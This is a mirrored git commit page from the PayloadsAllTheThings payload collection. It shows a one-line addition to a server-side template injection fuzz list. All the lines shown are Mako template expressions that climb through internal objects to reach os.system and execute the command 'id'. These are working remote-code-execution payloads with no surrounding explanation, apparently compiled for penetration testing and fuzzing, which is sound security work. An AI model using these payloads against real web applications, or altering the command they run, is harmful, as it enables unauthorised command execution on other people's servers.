mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-03-04 23:37:35 +00:00
Update ssti.fuzz
This commit is contained in:
parent
dcf8c6dd06
commit
2e1ca7710d
1 changed files with 1 additions and 0 deletions
|
@ -74,3 +74,4 @@ ${self.module.runtime.exceptions.compat.inspect.os.system("id")}
|
||||||
${self.template.module.cache.util.compat.inspect.os.system("id")}
|
${self.template.module.cache.util.compat.inspect.os.system("id")}
|
||||||
${self.context._with_template.module.runtime.util.os.system("id")}
|
${self.context._with_template.module.runtime.util.os.system("id")}
|
||||||
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
|
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.template.module.runtime.util.compat.inspect.os.system("id")}
|
||||||
|
|
Loading…
Add table
Reference in a new issue